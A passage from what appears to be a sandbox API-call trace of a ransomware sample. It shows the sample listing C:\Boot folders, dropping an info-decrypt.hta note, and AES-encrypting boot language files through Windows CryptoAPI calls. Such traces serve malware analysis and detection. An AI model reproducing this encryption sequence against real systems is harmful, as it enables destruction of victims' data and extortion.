lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0149.203] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0149.203] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa90 [0149.203] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.204] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0149.204] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0149.204] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.204] FindClose (in: hFindFile=0xb7fa90 | out: hFindFile=0xb7fa90) returned 1 [0149.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0149.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0149.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0149.204] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0149.204] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0149.204] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa90 [0149.205] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.205] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0149.205] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0149.205] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0149.205] FindClose (in: hFindFile=0xb7fa90 | out: hFindFile=0xb7fa90) returned 1 [0149.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0149.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0149.205] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0149.205] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0149.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0149.206] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta" (normalized: "c:\\boot\\en-us\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0149.206] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0149.206] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0149.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0149.206] CreateFileW (lpFileName="C:\\Boot\\en-US\\info-decrypt.hta" (normalized: "c:\\boot\\en-us\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0149.206] GetFileType (hFile=0x31c) returned 0x1 [0149.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0149.206] GetFileType (hFile=0x31c) returned 0x1 [0149.207] WriteFile (in: hFile=0x31c, lpBuffer=0x3820640*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x3820640*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0149.208] WriteFile (in: hFile=0x31c, lpBuffer=0x3820640*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x3820640*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0149.208] CloseHandle (hObject=0x31c) returned 1 [0149.208] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0149.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0149.208] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x382165c | out: lpFileInformation=0x382165c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40)) returned 1 [0149.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0149.208] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0149.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0149.208] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0149.209] GetFileType (hFile=0x31c) returned 0x1 [0149.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0149.209] GetFileType (hFile=0x31c) returned 0x1 [0149.209] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x14c40 [0149.209] ReadFile (in: hFile=0x31c, lpBuffer=0x4b5d8d0, nNumberOfBytesToRead=0x14c40, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x4b5d8d0*, lpNumberOfBytesRead=0x6a7f1bc*=0x14c40, lpOverlapped=0x0) returned 1 [0149.211] CloseHandle (hObject=0x31c) returned 1 [0149.211] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbe02d8) returned 1 [0149.212] CryptGenRandom (in: hProv=0xbe02d8, dwLen=0x10, pbBuffer=0x3821b1c | out: pbBuffer=0x3821b1c) returned 1 [0150.095] CryptImportKey (in: hProv=0xbe02d8, pbData=0x387d768, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f490) returned 1 [0150.095] CryptContextAddRef (hProv=0xbe02d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.095] CryptContextAddRef (hProv=0xbe02d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.095] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7fa10) returned 1 [0150.096] CryptContextAddRef (hProv=0xbe02d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.096] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x4, pbData=0x387d848*=0x1, dwFlags=0x0) returned 1 [0150.096] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x1, pbData=0x387d814, dwFlags=0x0) returned 1 [0150.096] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4b72530*, pdwDataLen=0x6a7f188*=0x14c50, dwBufLen=0x14c50 | out: pbData=0x4b72530*, pdwDataLen=0x6a7f188*=0x14c50) returned 1 [0150.097] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x387d870*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x387d870*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0150.099] CryptDestroyKey (hKey=0xb7f490) returned 1 [0150.099] CryptReleaseContext (hProv=0xbe02d8, dwFlags=0x0) returned 1 [0150.099] CryptReleaseContext (hProv=0xbe02d8, dwFlags=0x0) returned 1 [0150.099] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0150.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0150.099] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0150.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0150.102] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\memtest.exe.mui", lpFilePart=0x0) returned 0x1d [0150.102] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0150.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0150.102] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\info-decrypt.hta" (normalized: "c:\\boot\\en-us\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b2cce0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x16b2cce0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x16b2cce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0150.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0150.103] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\memtest.exe.mui", lpFilePart=0x0) returned 0x1d [0150.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0150.103] GetFileAttributesExW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x387e484 | out: lpFileInformation=0x387e484*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50)) returned 1 [0150.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0150.103] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\memtest.exe.mui", lpFilePart=0x0) returned 0x1d [0150.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0150.103] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0150.103] GetFileType (hFile=0x428) returned 0x1 [0150.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0150.103] GetFileType (hFile=0x428) returned 0x1 [0150.103] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0xaa50 [0150.104] ReadFile (in: hFile=0x428, lpBuffer=0x387e5fc, nNumberOfBytesToRead=0xaa50, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x387e5fc*, lpNumberOfBytesRead=0x6a7f1bc*=0xaa50, lpOverlapped=0x0) returned 1 [0150.338] CloseHandle (hObject=0x428) returned 1 [0150.338] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xb1dda0) returned 1 [0150.340] CryptGenRandom (in: hProv=0xb1dda0, dwLen=0x10, pbBuffer=0x38893a0 | out: pbBuffer=0x38893a0) returned 1 [0151.010] CryptImportKey (in: hProv=0xb1dda0, pbData=0x3852c1c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fad0) returned 1 [0151.010] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.010] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.010] CryptDuplicateKey (in: hKey=0xb7fad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7ef50) returned 1 [0151.010] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.010] CryptSetKeyParam (hKey=0xb7ef50, dwParam=0x4, pbData=0x3852cfc*=0x1, dwFlags=0x0) returned 1 [0151.010] CryptSetKeyParam (hKey=0xb7ef50, dwParam=0x1, pbData=0x3852cc8, dwFlags=0x0) returned 1 [0151.010] CryptEncrypt (in: hKey=0xb7ef50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3852d0c*, pdwDataLen=0x6a7f188*=0xaa60, dwBufLen=0xaa60 | out: pbData=0x3852d0c*, pdwDataLen=0x6a7f188*=0xaa60) returned 1 [0151.011] CryptEncrypt (in: hKey=0xb7ef50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x385d790*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x385d790*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0151.013] CryptDestroyKey (hKey=0xb7fad0) returned 1 [0151.013] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0151.013] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0151.013] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\memtest.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\memtest.exe.mui", lpFilePart=0x0) returned 0x1d [0151.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0151.013] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0151.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0151.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0151.015] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0151.015] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0151.015] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fad0 [0151.016] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.016] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0151.016] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.016] FindClose (in: hFindFile=0xb7fad0 | out: hFindFile=0xb7fad0) returned 1 [0151.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0151.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0151.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0151.017] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0151.017] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0151.017] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fad0 [0151.017] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.017] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0151.018] FindNextFileW (in: hFindFile=0xb7fad0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, 